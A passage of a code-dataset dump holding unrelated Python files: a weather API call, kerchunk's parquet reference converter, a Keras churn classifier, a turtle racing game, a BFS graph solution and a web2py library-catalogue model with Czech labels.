sys.argv[1]\n\n sys.path.insert(0, jediPath)\n import jedi\n if jediPreview:\n jedi.settings.cache_directory = os.path.join(\n jedi.settings.cache_directory, cachePrefix + jedi.__version__.replace('.', ''))\n # remove jedi from path after we import it so it will not be 
completed\n sys.path.pop(0)\n if len(modulesToLoad) > 0:\n jedi.preload_module(*modulesToLoad.split(','))\n JediCompletion().watch()\n","repo_name":"facebookarchive/nuclide","sub_path":"modules/atom-ide-debugger-python/VendorLib/vs-py-debugger/pythonFiles/completion.py","file_name":"completion.py","file_ext":"py","file_size_in_byte":25230,"program_lang":"python","lang":"en","doc_type":"code","stars":7820,"dataset":"github-code","pt":"75"} +{"seq_id":"22996908789","text":"import my_notebooks.modules.api_keys as api_keys\nimport requests\n\nurl = \"http://api.openweathermap.org/data/2.5/weather\"\nquery = {\n \"q\": \"Aarhus,dk\",\n \"mode\": \"json\",\n \"units\": \"metric\",\n \"appid\": api_keys.OPENWEATHERMAP\n}\n\nr = requests.get(url, params=query)\n\nprint(r.json())\n","repo_name":"KD131/sem4-python-notebooks","sub_path":"week6/openweather.py","file_name":"openweather.py","file_ext":"py","file_size_in_byte":289,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"22902543587","text":"import base64\n\nimport pandas as pd\nimport fsspec\n\nfrom kerchunk.utils import templateize\n\n# example from preffs's README'\ndf = pd.DataFrame(\n {\n \"key\": [\"a/b\", \"a/b\", \"b\"],\n \"path\": [\"a.dat\", \"b.dat\", None],\n \"offset\": [123, 12, 0],\n \"size\": [12, 17, 0],\n \"raw\": [None, None, b\"data\"],\n }\n)\n\n\ndef _proc_raw(r):\n if not isinstance(r, bytes):\n r = r.encode()\n if r.startswith(b\"base64:\"):\n return base64.b64decode(r[7:])\n return r\n\n\ndef refs_to_dataframe(\n refs,\n url,\n storage_options=None,\n partition=False,\n template_length=10,\n dict_fraction=0.1,\n min_refs=100,\n):\n \"\"\"Transform JSON/dict references to parquet storage\n\n This function should produce much smaller on-disk size for any large reference set,\n and much better memory footprint when loaded wih fsspec's DFReferenceFileSystem.\n\n Parameters\n ----------\n refs: str | dict\n Location of a JSON file containing references or a reference set already loaded\n into memory. It will get processed by the standard referenceFS, to normalise\n any templates, etc., it might contain.\n url: str\n Location for the output, together with protocol. If partition=True, this must\n be a writable directory.\n storage_options: dict | None\n Passed to fsspec when for writing the parquet.\n partition: bool\n If True, split out the references into \"metadata\" and separate files for each of\n the variables within the output directory.\n template_length: int\n Controls replacing a common prefix amongst reference URLs. If non-zero (in which\n case no templating is done), finds and replaces the common prefix to URLs within\n an output file (see :func:`kerchunk.utils.templateize`). If the URLs are\n dict encoded, this step is not attempted.\n dict_fraction: float\n Use categorical/dict encoding if the number of unique URLs / total number of URLs\n is is smaller than this number.\n min_refs: int\n If any variables have fewer entries than this number, they will be included in\n \"metadata\" - this is typically the coordinates that you want loaded immediately\n upon opening a dataset anyway. 
Ignored if partition is False.\n \"\"\"\n # normalise refs (e.g., for templates)\n fs = fsspec.filesystem(\"reference\", fo=refs)\n refs = fs.references\n\n df = pd.DataFrame(\n {\n \"key\": list(refs),\n # TODO: could get unique values using set() here and make categorical\n # columns with pd.Categorical.from_codes if it meets criterion\n \"path\": [r[0] if isinstance(r, list) else None for r in refs.values()],\n \"offset\": [\n r[1] if isinstance(r, list) and len(r) > 1 else 0 for r in refs.values()\n ],\n \"size\": pd.Series(\n [\n r[2] if isinstance(r, list) and len(r) > 1 else 0\n for r in refs.values()\n ],\n dtype=\"int32\",\n ),\n \"raw\": [\n _proc_raw(r) if not isinstance(r, list) else None for r in refs.values()\n ],\n }\n )\n # recoup memory\n fs.clear_instance_cache()\n del fs, refs\n\n if partition is False:\n templates = None\n haspath = ~df[\"path\"].isna()\n nhaspath = haspath.sum()\n if (\n dict_fraction\n and nhaspath\n and (df[\"path\"][haspath].nunique() / haspath.sum()) < dict_fraction\n ):\n df[\"path\"] = df[\"path\"].astype(\"category\")\n elif template_length:\n templates, urls = templateize(\n df[\"path\"][haspath], min_length=template_length\n )\n df.loc[haspath, \"path\"] = urls\n df.to_parquet(\n url,\n storage_options=storage_options,\n index=False,\n object_encoding={\"raw\": \"bytes\", \"key\": \"utf8\", \"path\": \"utf8\"},\n stats=[\"key\"],\n has_nulls=[\"path\", \"raw\"],\n compression=\"zstd\",\n engine=\"fastparquet\",\n custom_metadata=templates or None,\n )\n else:\n ismeta = df.key.str.contains(\".z\")\n extra_inds = []\n gb = df[~ismeta].groupby(df.key.map(lambda s: s.split(\"/\", 1)[0]))\n prefs = {\"metadata\"}\n for prefix, subdf in gb:\n if len(subdf) < min_refs:\n ind = ismeta[~ismeta].iloc[gb.indices[prefix]].index\n extra_inds.extend(ind.tolist())\n prefs.add(prefix)\n continue\n subdf[\"key\"] = subdf.key.str.slice(len(prefix) + 1, None)\n templates = None\n haspath = ~subdf[\"path\"].isna()\n nhaspath = haspath.sum()\n if (\n dict_fraction\n and nhaspath\n and (subdf[\"path\"][haspath].nunique() / haspath.sum()) < dict_fraction\n ):\n subdf[\"path\"] = subdf[\"path\"].astype(\"category\")\n elif template_length:\n templates, urls = templateize(\n subdf[\"path\"][haspath], min_length=template_length\n )\n subdf.loc[haspath, \"path\"] = urls\n\n subdf.to_parquet(\n f\"{url}/{prefix}.parq\",\n storage_options=storage_options,\n index=False,\n object_encoding={\"raw\": \"bytes\", \"key\": \"utf8\", \"path\": \"utf8\"},\n stats=[\"key\"],\n has_nulls=[\"path\", \"raw\"],\n compression=\"zstd\",\n engine=\"fastparquet\",\n custom_metadata=templates or None,\n )\n ismeta[extra_inds] = True\n df[ismeta].to_parquet(\n f\"{url}/metadata.parq\",\n storage_options=storage_options,\n index=False,\n object_encoding={\"raw\": \"bytes\", \"key\": \"utf8\", \"path\": \"utf8\"},\n stats=[\"key\"],\n has_nulls=[\"path\", \"raw\"],\n compression=\"zstd\",\n engine=\"fastparquet\",\n custom_metadata={\"prefs\": str(prefs)},\n )\n","repo_name":"dougiesquire/kerchunk","sub_path":"kerchunk/df.py","file_name":"df.py","file_ext":"py","file_size_in_byte":6140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"75"} +{"seq_id":"19509167845","text":"import numpy as np\nimport pandas as pd\nfrom keras.layers import Dense\nfrom keras.layers import Dropout\nfrom keras.models import Sequential\nfrom keras.wrappers.scikit_learn import KerasClassifier\nfrom sklearn.compose import make_column_transformer\nfrom sklearn.metrics import 
confusion_matrix\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder, StandardScaler\n\ndataset = pd.read_csv('Churn_Modelling.csv')\nX = dataset.iloc[:, 3:13].values\ny = dataset.iloc[:, 13].values\n\nlabelEncoderGender = LabelEncoder()\nX[:, 2] = labelEncoderGender.fit_transform(X[:, 2])\n\ncolumnTransformerCountry = make_column_transformer(\n (OneHotEncoder(categories='auto'), [1]),\n remainder='passthrough')\n\nX = columnTransformerCountry.fit_transform(X)\nX = X[:, 1:]\nX = X.astype(float)\nXtrain, XTest, yTrain, yTest = train_test_split(X, y, test_size=0.2, random_state=0)\n\nstandardScalerX = StandardScaler()\nXtrain = standardScalerX.fit_transform(Xtrain)\nXTest = standardScalerX.transform(XTest)\n\nclassifier = Sequential()\n\nclassifier.add(Dense(units=6, input_dim=11, kernel_initializer='uniform', activation='relu'))\nclassifier.add(Dropout(rate=0.1))\n\nclassifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))\n\nclassifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n\nclassifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\nclassifier.fit(Xtrain, yTrain, batch_size=10, epochs=100)\n\ny_pred = classifier.predict(XTest)\ny_pred = (y_pred > 0.5)\n\ncm = confusion_matrix(yTest, y_pred)\nprint(cm)\n\n\"\"\"Predict if the customer with the following informations will leave the bank:\nGeography: France\nCredit Score: 600\nGender: Male\nAge: 40\nTenure: 3\nBalance: 60000\nNumber of Products: 2\nHas Credit Card: Yes\nIs Active Member: Yes\nEstimated Salary: 50000\"\"\"\ncustomer1 = np.array([[600, 'France', 'Male', 40, 3, 60000, 2, 1, 1, 50000]])\ncustomer1[:, 2] = labelEncoderGender.transform(customer1[:, 2])\ncustomer1 = columnTransformerCountry.transform(customer1)\ncustomer1 = customer1[:, 1:]\ncustomer1 = customer1.astype(float)\ncustomer1 = standardScalerX.transform(customer1)\n\ncustomer1_pred = classifier.predict(customer1)\nprint(customer1_pred)\n\n'''\ndef buildClassifier():\n classifier = Sequential()\n classifier.add(Dense(units=6, input_dim=11, kernel_initializer='uniform', activation='relu'))\n classifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))\n classifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n classifier.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n return classifier\n\nclassifier = KerasClassifier(build_fn = buildClassifier, batch_size=10, epochs=100)\naccuracies = cross_val_score(estimator = classifier, X = Xtrain, y = yTrain, cv = 10, n_jobs = -1)\nmean = accuracies.mean()\nvariance = accuracies.std()\n'''\n\n\n\ndef buildClassifier(optimizer):\n classifier = Sequential()\n classifier.add(Dense(units=6, input_dim=11, kernel_initializer='uniform', activation='relu'))\n classifier.add(Dense(units=6, kernel_initializer='uniform', activation='relu'))\n classifier.add(Dense(units=1, kernel_initializer='uniform', activation='sigmoid'))\n classifier.compile(optimizer = optimizer, loss='binary_crossentropy', metrics=['accuracy'])\n return classifier\n\nclassifier = KerasClassifier(build_fn = buildClassifier)\nparameters = {'batch_size': [25, 32],\n 'epochs': [100, 200, 500],\n 'optimizer': ['adam', 'rmsprop']}\n\ngridSearch = GridSearchCV(estimator = classifier, param_grid = parameters,\n scoring = 'accuracy', cv = 10, n_jobs = -1)\n\ngridSearch = gridSearch.fit(Xtrain, 
yTrain)\nbest_accuracy = gridSearch.best_score_\nbest_parameters = gridSearch.best_params_\nbest_estimator = gridSearch.best_estimator_\n\n","repo_name":"epm157/python-projects","sub_path":"Deep Learning/Volume 1 - Supervised Deep Learning/Part 1 - Artificial Neural Networks (ANN)/Test.py","file_name":"Test.py","file_ext":"py","file_size_in_byte":3941,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"16301105974","text":"import turtle as tur\nimport random as ran\nfrom tkinter import messagebox\nspd = 99999\ndef clean():\n pink = 0\n green = 0\n blue = 0\n red = 0\n purple = 0\n orange = 0\ndef mkboard(t1b,t2b,t3b,t4b,t5b,t6b,t1n,t2n,t3n,t4n,t5n,t6n):\n#_________________\\n\n#|1|{t1n}|{t1b}|\\n\n#|----------------\\n\n#|2|{t2n}|{t2b}|\\n\n#|---------------\\n\n#|3|{t3n}|{t3b}|\\n\n#|----------------\\n\n#|4|{t4n}|{t4b}|\\n\n#|----------------\\n\n#|5|{t5n}|{t5b}|\\n\n#|----------------\\n\n#|6|{t6n}|{t6b}|\\n\n#|----------------\\n\n#\n board = (f\"_________________\\n|1|{t1n}|{t1b}|\\n|----------------\\n|2|{t2n}|{t2b}|\\n|---------------\\n|3|{t3n}|{t3b}|\\n|----------------\\n|4|{t4n}|{t4b}|\\n|----------------\\n|5|{t5n}|{t5b}|\\n|----------------\\n|6|{t6n}|{t6b}|\\n|----------------\\n\")\n return board\ndef determper(ranum, personal, turtle, ranum2, rl):\n if int(turtle) == 1:\n if rl == 1:\n t1.right(ranum2)\n t1.forward(ranum)\n if rl == 2:\n t1.left(ranum2)\n t1.forward(ranum)\n elif int(turtle) == 2:\n if rl == 1:\n t2.right(ranum2)\n t2.forward(ranum)\n if rl == 2:\n t2.left(ranum2)\n t2.forward(ranum)\n elif int(turtle) == 3:\n if rl == 1:\n t3.right(ranum2)\n t3.forward(ranum)\n if rl == 2:\n t3.left(ranum2)\n t3.forward(ranum)\n elif int(turtle) == 4:\n if rl == 1:\n t4.right(ranum2)\n t4.forward(ranum)\n if rl == 2:\n t4.left(ranum2)\n t4.forward(ranum)\n elif int(turtle) == 5:\n if rl == 1:\n t5.right(ranum2)\n t5.forward(ranum)\n if rl == 2:\n t5.left(ranum2)\n t5.forward(ranum)\n elif int(turtle) == 6:\n if rl == 1:\n t6.right(ranum2)\n t6.forward(ranum)\n if rl == 2:\n t6.left(ranum2)\n t6.forward(ranum)\n \npink = 0\ngreen = 0\nblue = 0\nred = 0\npurple = 0\norange = 0\nstoreto = int(input(\"What score would you like the turtles to go too?\\n\"))\nwhile True:\n tur.speed(100)\n tur.setheading(0)\n tur.goto(0,0)\n print(\"start\")\n tur.up()\n #tur.left(90)\n tur.forward(200)\n tur.right(90)\n tur.down()\n tur.forward(125)\n tur.right(90)\n tur.up()\n tur.forward(400)\n tur.down()\n tur.right(90)\n tur.forward(125)\n tur.right(90)\n tur.up()\n tur.forward(200)\n tur.right(90)\n tur.forward(125/2)\n tur.right(90)\n tur.up()\n tur.goto(900,900)\n\n ##line##\n\n t1 = tur.Turtle()\n t1.speed(100)\n t1.up()\n t1.forward(200)\n t1.right(90)\n forw = 100/6\n t1.forward(forw)\n t1.right(90)\n t1.down()\n\n ##t2##\n\n t2 = tur.Turtle()\n t2.speed(100)\n t2.up()\n t2.forward(200)\n t2.right(90)\n forw = 100/6\n t2.forward(forw+forw)\n t2.right(90)\n t2.down()\n\n ##t3##\n\n t3 = tur.Turtle()\n t3.speed(100)\n t3.up()\n t3.forward(200)\n t3.right(90)\n forw = 100/6\n t3.forward(forw+forw+forw)\n t3.right(90)\n t3.down()\n\n ##t4##\n\n t4 = tur.Turtle()\n t4.speed(100)\n t4.up()\n t4.forward(200)\n t4.right(90)\n forw = 100/6\n t4.forward(forw+forw+forw+forw)\n t4.right(90)\n t4.down()\n\n ##t5##\n\n t5 = tur.Turtle()\n t5.speed(100)\n t5.up()\n t5.forward(200)\n t5.right(90)\n forw = 100/6\n t5.forward(forw+forw+forw+forw+forw)\n t5.right(90)\n t5.down()\n\n ##t6##\n\n t6 = tur.Turtle()\n t6.speed(100)\n t6.up()\n 
t6.forward(200)\n t6.right(90)\n f6rw = 100/6\n t6.forward(forw+forw+forw+forw+forw+forw)\n t6.right(90)\n t6.down()\n\n ##racing##\n game = 1\n cpos1 = 0\n cpos2 = 0\n cpos3 = 0\n cpos4 = 0\n cpos5 = 0\n cpos6 = 0\n t1.color(\"pink\")\n t2.color(\"green\")\n t3.color(\"blue\")\n t4.color(\"red\")\n t5.color(\"purple\")\n t6.color(\"orange\")\n t1.speed(spd)\n t2.speed(spd)\n t3.speed(spd)\n t4.speed(spd)\n t5.speed(spd)\n t6.speed(spd)\n while game == 1:\n random1 = ran.randint(1,20)\n random2 = ran.randint(1,20)\n random3 = ran.randint(1,20)\n random4 = ran.randint(1,20)\n random5 = ran.randint(1,20)\n random6 = ran.randint(1,20)\n person = ran.randint(0,2)\n rl = ran.randint(1,2)\n determper(random1, person, 1, person, rl)\n #print(\"1\")\n person = ran.randint(0,2)\n rl = ran.randint(1,2)\n determper(random2, person, 2, person, rl)\n #print(\"2\")\n person = ran.randint(0,2)\n rl = ran.randint(1,2)\n determper(random3, person, 3, person, rl)\n #print(\"3\")\n person = ran.randint(0,2)\n rl = ran.randint(1,2)\n determper(random4, person, 4, person, rl)\n #print(\"4\")\n person = ran.randint(0,2)\n rl = ran.randint(1,2)\n determper(random5, person, 5, person, rl)\n #print(\"5\")\n person = ran.randint(0,2)\n rl = ran.randint(1,2)\n determper(random6, person, 6, person, rl)\n #print(\"6\")\n #print(\"ck1\")\n cpos1 = t1.xcor()\n cpos2 = t2.xcor()\n cpos3 = t3.xcor()\n cpos4 = t4.xcor()\n cpos5 = t5.xcor()\n cpos6 = t6.xcor()\n #print(\"ck2\")\n #import os\n #os.system(\"clear\")\n numbert = -200\n numbert = float(numbert)\n if float(round(t1.xcor())) <= numbert or float(round(t2.xcor())) <= numbert or float(round(t3.xcor())) <= numbert or float(round(t4.xcor())) <= numbert or float(round(t5.xcor())) <= numbert or float(round(t6.xcor())) <= numbert:\n winners = ['','','','','','']\n winners[0] = cpos1\n winners[1] = cpos2\n winners[2] = cpos3\n winners[3] = cpos4\n winners[4] = cpos5\n winners[5] = cpos6\n winners.sort()\n count = -1\n winatlis = ['','','','','','']\n for x in winners:\n count = count+1\n if x == cpos1:\n winatlis[count] = \"pink\"\n if x == cpos2:\n winatlis[count] = \"green\"\n if x == cpos3:\n winatlis[count] = \"blue\"\n if x == cpos4:\n winatlis[count] = \"red\"\n if x == cpos5:\n winatlis[count] = \"purple\"\n if x == cpos6:\n winatlis[count] = \"orange\"\n if winatlis[0] == \"pink\":\n pink = pink+1\n if winatlis[0] == \"green\":\n green = green+1\n if winatlis[0] == \"blue\":\n blue = blue+1\n if winatlis[0] == \"red\":\n red = red+1\n if winatlis[0] == \"purple\":\n purple = purple+1\n if winatlis[0] == \"orange\":\n orange = orange+1\n if int(pink) == int(storeto) or int(green) == int(storeto) or int(blue) == int(storeto) or int(red) == int(storeto) or int(purple) == int(storeto) or int(orange) == int(storeto):\n wincol = []\n wincol.append(pink)\n wincol.append(green)\n wincol.append(blue)\n wincol.append(red)\n wincol.append(purple)\n wincol.append(orange)\n wincol.sort()\n wincolatlis = []\n for x in wincol:\n if x == pink:\n wincolatlis.append(\"Pink\")\n if x == green:\n wincolatlis.append(\"Green\")\n if x == blue:\n wincolatlis.append(\"Blue\")\n if x == red:\n wincolatlis.append(\"Red\")\n if x == purple:\n wincolatlis.append(\"Purple\")\n if x == orange:\n wincolatlis.append(\"Orange\")\n \n messagebox.showinfo('information', mkboard(wincol[0],wincol[1],wincol[2],wincol[3],wincol[4],wincol[5],wincolatlis[0],wincolatlis[1],wincolatlis[2],wincolatlis[3],wincolatlis[4],wincolatlis[5]))\n yn = messagebox.askyesno('Play again?', 'Play again?')\n if yn == 
True:\n tur.reset()\n t1.reset()\n t2.reset()\n t3.reset()\n t4.reset()\n t5.reset()\n t6.reset()\n t1.up()\n t2.up()\n t3.up()\n t4.up()\n t5.up()\n t6.up()\n break\n if yn == False:\n exit()\n else:\n tur.reset()\n t1.reset()\n t2.reset()\n t3.reset()\n t4.reset()\n t5.reset()\n t6.reset()\n t1.up()\n t2.up()\n t3.up()\n t4.up()\n t5.up()\n t6.up()\n break\n","repo_name":"Duedot43/PythonProgramsForHS","sub_path":"Python/Unit 5/turtle_racev2.py","file_name":"turtle_racev2.py","file_ext":"py","file_size_in_byte":9047,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10793632326","text":"import sys\nfrom collections import deque\ninput = sys.stdin.readline\nINF = int(1e9)\ndef bfs(start, k):\n global graph\n visited = [False] * (N+1)\n q = deque()\n q.append(start)\n count = 0\n while q:\n now = q.popleft()\n visited[now] = True\n for n_n, w in graph[now]:\n if not visited[n_n] and w >= k:\n q.append(n_n)\n count += 1\n return count\nN, Q = map(int, input().split())\ngraph = [[] for _ in range(N+1)]\nfor _ in range(N-1):\n a, b, c = map(int, input().split())\n graph[a].append((b, c))\n graph[b].append((a, c))\n\nfor _ in range(Q):\n k, v = map(int, input().split())\n print(bfs(v, k))\n\n# import sys\n# input = sys.stdin.readline\n# INF = float('INF')\n\n# # bfs 함수\n\n\n# def bfs(v):\n# q = [(v, INF)] # v번 동영상부터 시작\n# visited = [False for _ in range(N+1)] # 이번 bfs에서 방문 여부 체크\n# visited[v] = True\n\n# while q:\n# nv, u = q.pop(0) # nv: 다음 동영상, u: usado\n\n# # next: nv번 동영상과 연결된 다음 동영상, nextU: nv번 동영상과 next번 동영상의 usado\n# for (next, nextU) in path[nv]:\n# if visited[next]: # 이미 방문한 동영상일 경우 continue\n# continue\n\n# nextUsado = min(u, nextU) # 현재까지 연결들의 최솟값을 기록\n# q.append((next, nextUsado))\n# # usado리스트에 v번 동영상부터 next번 동영상까지의 usado 최솟값 기록\n# usado[v][next] = nextUsado\n# visited[next] = True # next번 동영상의 방문 여부 갱신\n\n\n# if __name__ == '__main__':\n# N, Q = map(int, input().split()) # N: 동영상의 개수, Q: 질문의 개수\n# check = [False for _ in range(N+1)] # n번 동영상 bfs 여부\n# usado = [[0 for _ in range(N+1)]\n# for _ in range(N+1)] # n번 동영상의 각 동영상에 대한 usado 기록\n# path = [[] for _ in range(N+1)] # 입력으로 주어지는 두 동영상 쌍의 usado\n\n# for _ in range(N-1):\n# p, q, r = map(int, input().split()) # 동영상 p, q와 usado에 해당하는 r\n# path[p].append((q, r)) # path에 usado 기록\n# path[q].append((p, r))\n\n# for _ in range(Q):\n# k, v = map(int, input().split()) # k: usado 기준, v: 동영상 번호\n\n# if check[v]: # 이미 bfs를 진행한 동영상이라면\n# print(len([x for x in usado[v] if x >= k])) # 바로 k 이상의 동영상 개수를 찾는다\n# continue\n\n# check[v] = True # bfs를 진행했음을 기록하고\n# bfs(v) # 동영상 v에 대하여 bfs 진행\n# print(len([x for x in usado[v] if x >= k])) # k 이상의 동영상 개수를 찾는다\n\n# # from collections import defaultdict, deque\n\n# # def find_video(start_n, k, map_dict):\n# # queue = deque()\n# # queue.append((start_n, float('inf')))\n# # visit_list = [-1] * N\n# # visit_list[start_n] = 1\n# # count = 0\n\n# # while queue:\n# # pop_node, min_dist = queue.popleft()\n# # for next_n, dist in map_dict[pop_node]:\n# # if visit_list[next_n] == 1: continue\n# # if min_dist > dist:\n# # queue.append((next_n, dist))\n# # if dist >= k: count += 1\n# # else:\n# # queue.append((next_n, min_dist))\n# # if min_dist >= k: count += 1\n# # visit_list[next_n] = 1\n\n# # return count\n\n# # N, Q = map(int, input().split())\n# # map_dict = defaultdict(list)\n# # for _ in range(N-1):\n# # p, q, r = map(int, input().split())\n# # map_dict[p-1].append((q-1, r))\n# # map_dict[q-1].append((p-1, r))\n# # for _ in range(Q):\n# # k, v = 
map(int, input().split())\n# # print(find_video(v-1, k, map_dict))","repo_name":"hyunjinee/Algorithm","sub_path":"solved.ac/python/15591.py","file_name":"15591.py","file_ext":"py","file_size_in_byte":3795,"program_lang":"python","lang":"ko","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"41299585390","text":"# -*- coding: utf-8 -*-\n\nfrom itertools import groupby\n\nfrom global_settings import DEFAULT_CURRENCY, SUPPORTED_CURRENCIES, TESTING_LIB_ID\nfrom c_db import PublLengths\n\n\nauth.settings.create_user_groups = None\ncurrent.auth = auth\n\n# TODO: přidej Objednávku do HACTIONS: bude zřejmě vyžadovat extra tabulku jen částečně zpracovaných knih\nHACTIONS = (('+o', T(\"zaevidován zpětně\")), ('+g', T(\"získán jako dar\")), ('+n', T(\"zaevidován - nový nákup\")),\n ('--', T(\"vyřazen (bez dalších podrobností)\")),\n ('-d', T(\"vyřazen (likvidován)\")), ('-b', T(\"předán ke svázání (vyřazen)\")),\n ('-g', T(\"vyřazen (darován)\")), ('-n', T(\"odprodán\")), ('-?', T(\"nezvěstný vyřazen\")),\n ('+f', T(\"cizí dočasně zařazen (zapůjčený výtisk)\")), ('-f', T(\"zapůjčený cizí vyřazen (vrácen zpět - odevzdán)\")),\n ('o+', T(\"náš zapůjčený zařazen (byl vrácen zpět)\")), ('o-', T(\"náš dočasně vyřazen (zapůjčen - předán)\")),\n ('l+', T(\"vrácen\")), ('l-', T(\"vypůjčen\")),\n ('l!', T(\"upomínka\")), ('ll', T(\"prodloužen vzdáleně\")), ('lL', T(\"prodloužen fyzicky\")),\n ('r*', T(\"revidován\")), ('r?', T(\"označen jako nezvěstný\")),\n ) # 'r?' status of the impression is active if 'r?' is the last item in the impr_hist\nHACTIONS_IN = tuple(filter(lambda ha: ha[0][0] == '+', HACTIONS))\nHACTIONS_OUT = tuple(filter(lambda ha: ha[0][0] == '-', HACTIONS))\nHACTIONS_MVS = (('+f', T(\"získali jsme cizí knihy odjinud\")),\n ('-f', T(\"vrátili jsme cizí knihy\")),\n ('o-', T(\"zapůjčili jsme naše knihy jinam\")),\n ('o+', T(\"vrátily se nám naše knihy\")))\nHACTIONS_MVS_HINT = (('+f', T(\"cizí knihy dočasně získávám (současně označte Příjem)\")),\n ('-f', T(\"cizí knihy vracím zpět - odevzdávám\")),\n ('o-', T(\"naše knihy zapůjčuji - předávám\")),\n ('o+', T(\"naše knihy se vrátily - zařazuji je zpět (je doporučeno označit Příjem)\")))\ndtformat = T('%d.%m.%Y %H:%M', lazy=False)\n\n\"\"\"deaktivovano\nclass UNIQUE_QUESTION(object):\n def __init__(self, error_message=T('dotaz už je ve frontě')):\n self.error_message = error_message\n def __call__(self, value):\n if db((db.question.question == value) & (db.question.auth_user_id == auth.user_id) & (db.question.live == True)\n ).select(db.question.id, limitby=(0, 1)):\n return (value, self.error_message)\n else:\n return (value, None)\n\"\"\"\n\nLIBRARY_TYPES = (('tst', T(\"jen pro odzkoušení\")), ('per', T(\"osobní knihovna\")), # testing as first!\n ('pub', T(\"veřejná knihovna\")), ('sch', T(\"školní knihovna\")),\n ('pri', T(\"knihovna firmy nebo instituce\")), ('ant', T(\"antkvariát\")),\n ('bsr', T(\"knihkupec\")), ('bsd', T(\"knižní velkoobchod, distribuce\")), ('plr', T(\"nakladatel\")),\n ('oth', T(\"jiné, nelze zařadit\")),\n )\nIMPORT_SOURCES = (('codex', T(\"codex/DOS\")),) # key is used in URL, use proper characters (but we do encode it)\n\ndb.define_table('library',\n Field('library', 'string', length=128, requires=[IS_NOT_EMPTY(), IS_NOT_IN_DB(db, 'library.library')],\n label=T(\"Jméno knihovny\"), comment=T(\"nejedná-li se o oficiální titul knihovny, neuvádějte zde její typ; pro osobní knihovnu zadejte např. 
Petr Starý, Kladno\")),\n Field('slug', 'string', length=32,\n requires=[IS_NOT_EMPTY(), IS_NOT_IN_DB(db, 'library.slug')],\n label=T(\"URL jméno\"), comment=T(\"jméno do URL adresy [malá písmena, číslice, pomlčka/podtržítko] (příklad: petr_stary_kladno)\")),\n Field('is_public', 'boolean', default=True,\n label=T(\"Veřejně přístupný katalog\")),\n Field('news_cnt', 'integer', default=30,\n label=T(\"Počet zobrazených novinek\"), comment=T(\"0..nezobrazovat, >0..počet titulů\")),\n Field('street', 'string', length=48,\n label=T(\"Ulice\"), comment=T(\"ulice (nepovinné)\")),\n Field('city', 'string', length=48,\n label=T(\"Místo\"), comment=T(\"město nebo obec\")),\n Field('plz', 'string', length=8,\n label=T(\"PSČ\"), comment=T(\"poštovní směrovací číslo obce\")),\n Field('ltype', 'string', length=3, default=LIBRARY_TYPES[0][0],\n notnull=True, requires=IS_IN_SET(LIBRARY_TYPES),\n label=T(\"Typ knihovny\"), comment=T(\"typ knihovny\")),\n Field('src_quality', 'integer', default=30, writable=False,\n label=T(\"Kvalita zdroje\"), comment=T(\"kvalita zdroje [%]\")),\n Field('old_system', 'string', length=48,\n label=T(\"Jiný systém\"), comment=T(\"předchozí nebo hlavní evidenční knihovnický systém\")),\n Field('imp_system', 'string', length=18,\n requires=IS_EMPTY_OR(IS_IN_SET(IMPORT_SOURCES)),\n label=T(\"Importovat z ..\"), comment=T(\"(pro import z dosud nepodporovaného zdroje kontaktujte administrátora)\")),\n Field('created', 'datetime', default=datetime.datetime.utcnow(),\n notnull=True, writable=False,\n label=T(\"Vytvořeno\"), comment=T(\"čas vytvoření evidence\")),\n Field('completed', 'date',\n label=T(\"Dokončeno\"), comment=T(\"datum dokončení zápisu fondu knihovny\")),\n Field('review_date', 'date', default=datetime.date.today(),\n notnull=True, requires=[IS_NOT_EMPTY(), IS_DATE(format=T('%d.%m.%Y'))],\n label=T(\"Zahájení revize\"), comment=T(\"den zahájení revize (vypíší se výtisky, nenalezené od tohoto data)\")),\n Field('st_imp_id', 'boolean', notnull=True, default=False, # libstyle['id'][0] = I\n label=T(\"Přír.číslo ?\"), comment=T(\"označte, pokud knihovna používá přírůstková čísla výtisků\")),\n Field('st_imp_idx', 'integer', notnull=True, default=1, # libstyle['id'][1] = 0|1|2|.. which number-part of ID should be incremented\n label=T(\"Typ inkrementování\"), comment=T(\"0 nezvětšovat přír.číslo; 1 zvětšovat resp. zvětšovat první nalezené číslo; 2 zvětšovat druhé nalezené podčíslo (např. při stylu: rok/číslo)\")),\n Field('st_imp_ord', 'boolean', notnull=True, default=False, # libstyle['id'][2] = O\n label=T(\"Čís.výtisku ?\"), comment=T(\"označte, pokud se má zobrazovat číslo výtisku jako rozlišení výtisků každé publikace\")),\n Field('st_imp_rik', 'integer', # libstyle['lrik'] = 2/3/4/5/6\n notnull=True, default=3, requires=IS_INT_IN_RANGE(2, 7),\n label=T(\"Rychlá identifikace\"), comment=T(\"[DŮLEŽITÉ: později NEMĚNIT!] kolikamístné číslo používat pro rychlé hledání knihy z klávesnice? 
zvol podle velikosti knihovny: 2 - do počtu 50 výtisků, 3 - do 500, 4 - do 5000, 5 - do 50000, 6 - nad 50000\")),\n Field('st_imp_bc', 'boolean', notnull=True, default=False, # libstyle['bc'][0] = B\n label=T(\"Čarové kódy ?\"), comment=T(\"označte, pokud knihovna používá vlastní čarové kódy\")),\n Field('st_imp_bc2', 'boolean', notnull=True, default=True, # libstyle['bc'][1] = +\n label=T(\"Inkremetovat čar.kódy ?\"), comment=T(\"Ano: čarový kód více výtisků bude předvyplněn zvětšujícím se číslem; Ne: čar.kód 2+ výtisku doplníte ručně\")),\n Field('st_imp_pl', 'boolean', notnull=True, default=False, # libstyle['gr'][0] = P\n label=T(\"Umístění výtisku ?\"), comment=T(\"označte, pokud chcete zapisovat, kde je výtisk umístěn (oddělení, místnost, regál, apod.)\")),\n Field('st_imp_sg', 'boolean', notnull=True, default=False, # libstyle['sg'][0] = G\n label=T(\"Signatura výtisku ?\"), comment=T(\"označte, 